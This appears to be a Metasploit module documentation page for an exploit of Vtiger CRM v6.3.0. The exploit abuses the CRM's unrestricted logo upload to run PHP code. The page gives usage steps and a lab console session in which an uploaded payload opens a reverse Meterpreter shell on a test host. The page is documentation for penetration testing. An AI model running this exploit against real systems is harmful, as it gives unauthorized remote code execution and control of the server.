adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
metasploit-gs/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md
T
Jacob Robles fe9315dc89 Update module, Add documentation
2018-07-30 12:11:08 -05:00

1.6 KiB
Raw Blame History

Description

Vtiger v6.3.0 CRM's administration interface allows for the upload of a company logo. The logo upload allows unrestricted file upload and can be used to upload php code, which can then be executed by requesting the uploaded file location.

Vulnerable Application

Vtiger v6.3.0

Options

PHPSHORTTAG Specify the use of php short tag, <? , for wrapping the payload. Default: true

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/vtiger_logo_upload_exec
  3. set rhosts <rhost>
  4. set password <password>
  5. run

Scenarios

VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)

msf5 > use exploit/multi/http/vtiger_logo_upload_exec
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899
rport => 8899
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin
password => admin
msf5 exploit(multi/http/vtiger_logo_upload_exec) > run 

[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Uploading payload: KpXAXQNKjN.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500
[+] Deleted KpXAXQNKjN.php

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586
Meterpreter : php/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink